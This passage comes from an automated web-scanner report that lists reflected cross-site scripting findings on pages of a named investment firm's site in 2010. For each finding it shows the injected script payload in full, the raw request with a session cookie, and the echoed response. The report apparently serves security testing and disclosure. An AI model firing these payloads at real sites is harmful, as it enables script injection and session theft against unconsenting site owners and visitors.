Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7158
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/apply/software.php?93d36"><script>alert(1)</script>e633747ac48=1">
...[SNIP]...

1.17. http://www.janestcapital.com/apply/system.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/system.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7234"><script>alert(1)</script>db6705aa21d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/system.php?a7234"><script>alert(1)</script>db6705aa21d=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6796
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/apply/system.php?a7234"><script>alert(1)</script>db6705aa21d=1">
...[SNIP]...

1.18. http://www.janestcapital.com/apply/trade.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/trade.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39546"><script>alert(1)</script>68bc268e1e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply/trade.php?39546"><script>alert(1)</script>68bc268e1e3=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6836
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/apply/trade.php?39546"><script>alert(1)</script>68bc268e1e3=1">
...[SNIP]...

1.19. http://www.janestcapital.com/education/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/education/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f154"><script>alert(1)</script>6246acec2f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/?1f154"><script>alert(1)</script>6246acec2f0=1 HTTP/1.1
Host: www.janestcapital.com
Proxy-Connection: keep-alive
Referer: http://www.janestcapital.com/apply/calendar.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.5.10.1293334270

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6727
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/education/?1f154"><script>alert(1)</script>6246acec2f0=1">
...[SNIP]...

1.20. http://www.janestcapital.com/education/curriculum.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/education/curriculum.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aad66"><script>alert(1)</script>354e0a38ff8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/curriculum.php?aad66"><script>alert(1)</script>354e0a38ff8=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7633
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/education/curriculum.php?aad66"><script>alert(1)</script>354e0a38ff8=1">
...[SNIP]...

1.21. http://www.janestcapital.com/education/reimbursement.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/education/reimbursement.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25501"><script>alert(1)</script>400512c4c9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/reimbursement.php?25501"><script>alert(1)</script>400512c4c9b=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6128
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/education/reimbursement.php?25501"><script>alert(1)</script>400512c4c9b=1">
...[SNIP]...

1.22. http://www.janestcapital.com/education/speakers.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/education/speakers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdb4a"><script>alert(1)</script>ae158023d0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/speakers.php?cdb4a"><script>alert(1)</script>ae158023d0d=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11756

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/education/speakers.php?cdb4a"><script>alert(1)</script>ae158023d0d=1">
...[SNIP]...

1.23. http://www.janestcapital.com/home/contact_us.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/home/contact_us.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26abd"><script>alert(1)</script>fb5445faa35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/contact_us.php?26abd"><script>alert(1)</script>fb5445faa35=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6397
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/home/contact_us.php?26abd"><script>alert(1)</script>fb5445faa35=1">
...[SNIP]...

1.24. http://www.janestcapital.com/home/contact_us.php/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/home/contact_us.php/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8d80"><script>alert(1)</script>da12704170 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/contact_us.php/x22e8d80"><script>alert(1)</script>da12704170 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6397
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/home/contact_us.php/x22e8d80"><script>alert(1)</script>da12704170">
...[SNIP]...

1.25. http://www.janestcapital.com/home/contact_us.php/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/home/contact_us.php/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebb26"><script>alert(1)</script>1c3d162596 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/contact_us.php/x22?ebb26"><script>alert(1)</script>1c3d162596=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6400
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/home/contact_us.php/x22?ebb26"><script>alert(1)</script>1c3d162596=1">
...[SNIP]...

1.26. http://www.janestcapital.com/home/history.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/home/history.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7cc6"><script>alert(1)</script>b9d24e94547 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/history.php?b7cc6"><script>alert(1)</script>b9d24e94547=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7078
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/home/history.php?b7cc6"><script>alert(1)</script>b9d24e94547=1">
...[SNIP]...

1.27. http://www.janestcapital.com/home/history.php/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/home/history.php/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf717"><script>alert(1)</script>c8eac2f6dbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/history.php/x22cf717"><script>alert(1)</script>c8eac2f6dbe HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7079
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/home/history.php/x22cf717"><script>alert(1)</script>c8eac2f6dbe">
...[SNIP]...

1.28. http://www.janestcapital.com/home/history.php/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/home/history.php/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 254f7"><script>alert(1)</script>b399808fcb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/history.php/x22?254f7"><script>alert(1)</script>b399808fcb1=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7082
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/home/history.php/x22?254f7"><script>alert(1)</script>b399808fcb1=1">
...[SNIP]...

1.29. http://www.janestcapital.com/home/philosophy.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/home/philosophy.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12b7d"><script>alert(1)</script>a29629a4969 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/philosophy.php?12b7d"><script>alert(1)</script>a29629a4969=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6732
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/home/philosophy.php?12b7d"><script>alert(1)</script>a29629a4969=1">
...[SNIP]...

1.30. http://www.janestcapital.com/ja/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39329"><script>alert(1)</script>db202469d56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ja/?39329"><script>alert(1)</script>db202469d56=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7749
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/?39329"><script>alert(1)</script>db202469d56=1">
...[SNIP]...

1.31. http://www.janestcapital.com/ja/apply/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/apply/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e2a"><script>alert(1)</script>2cc17194665 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ja/apply/?d5e2a"><script>alert(1)</script>2cc17194665=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6491
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/apply/?d5e2a"><script>alert(1)</script>2cc17194665=1">
...[SNIP]...

1.32. http://www.janestcapital.com/ja/apply/calendar.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/apply/calendar.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f27"><script>alert(1)</script>ad9bf866607 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ja/apply/calendar.php?f3f27"><script>alert(1)</script>ad9bf866607=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6803
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/apply/calendar.php?f3f27"><script>alert(1)</script>ad9bf866607=1">
...[SNIP]...

1.33. http://www.janestcapital.com/ja/education/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/education/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a03"><script>alert(1)</script>3bcd5e7e3f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ja/education/?53a03"><script>alert(1)</script>3bcd5e7e3f0=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
